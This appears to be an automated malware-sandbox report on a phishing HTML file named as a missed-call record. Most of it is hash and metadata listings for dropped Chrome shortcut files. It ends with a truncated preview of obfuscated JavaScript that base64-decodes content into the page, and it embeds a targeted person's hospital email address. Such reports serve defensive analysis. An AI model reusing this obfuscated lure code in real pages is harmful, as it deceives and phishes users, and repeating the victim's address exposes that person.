                                      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:07:15 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2681
                                      Entropy (8bit):4.00776447207865
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:E1461C5CCACC3358C14C931CF243B465
                                      SHA1:509F6547AC3B8E6B73B6804B37AA8638CB5301B1
                                      SHA-256:6D5A18FA15649AD50F3A1A2CC0C16D4F43E55C2C8E8C04BA55B241BC0C5D97AC
                                      SHA-512:CFACC925CA50ECC76B632714CC08207BA71B808166A337F24CABC389D942336960AFF977D020A1DB32D417EEC2C256414CCB674CED3727AEE3AEB68BFA0F3C78
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.....Z..f......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Z............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:07:15 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2681
                                      Entropy (8bit):3.996353166570957
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:60BA1E873D2E4488B72CFE016C8B1961
                                      SHA1:4E50024317A41AB3E30A9B61E09530520825FEC7
                                      SHA-256:C13C838A2620AC4F4D7FDD918D7768CBE442958F82362154394DD2A6658CDA8E
                                      SHA-512:B38BA611385C42D6AED47C5E9E216EDEC247D53E7B13A27585840A61516B38B35BF38132C1B3A9C9D15E4BD8CD8D238EA96D78060BB98A0C51044BCF4856678E
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....\y..f......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Z............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:07:15 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2683
                                      Entropy (8bit):4.011414793506182
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B1AC0924E0FAA0575F84795606A425A3
                                      SHA1:D0311A7AE10E19BF96558C7E635B1B5CFC62147E
                                      SHA-256:DD0D03108BF349987159E2739DCD1118CB4B3745DA5EEC9489A37B817F1E2698
                                      SHA-512:30039D3335926534F8373EC1967E01AE37D7E1775A2443A26D913AF811B4C7B11794F56E071DD1E8E3B65D0E55D1BDD3063BA99C3C5472DC17B00D71A4CEB0F6
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,........f......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Z.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Z............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Z............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      File type:HTML document, ASCII text, with very long lines (3148), with no line terminators
                                      Entropy (8bit):5.8593056963716394
                                      TrID:
                                      • HTML Application (8008/1) 100.00%
                                      File name:MissedCall_Record_3295935663.html
                                      File size:3'148 bytes
                                      MD5:b058f3f35f11d12f39651ecbab310b21
                                      SHA1:5712bfd7bd20b9665b19ccc11456e8d34eebc97e
                                      SHA256:a1211ebd6e5d214b3137cbad90d53d209629060a361dab66cb91fff2b0116f0a
                                      SHA512:880c4a4ee631d85ad733368cc85f19408b69ab8f7e3dd27de024cb272948e97970589cd0ec2d0b773dd00a696a03a5e554cb5cc5fa69b106f03505e56d278ec9
                                      SSDEEP:96:DaqeaFIHFPZ2Hg3zzNY+hzyooosdDnNzA9al:9erPZDY+dyoooAP
                                      TLSH:6D510BDCC5018C43DE984D7D497D422F97EC2E0A62D5758A3C9CB54A9CEB72068CEB36
                                      File Content Preview:<script> </script> <script> _0xccc7 = '#Bsara.fisher@overlakehospital.org'; (() => { const _0xeb5f = atob, _0x9b65 = ["ZG9jdW1lbnQud3JpdGUoYXRvYihgUEdoMGJXdytEUW84YldWMFlTQnVZVzFsUFNKMmFXVjNjRzl5ZENJZ1kyOXVkR1Z1ZEQwaWQybGtkR2c5WkdWMmFXTmxMWGRwWkhSb0xDQUp
                                      Icon Hash:173149cccc490307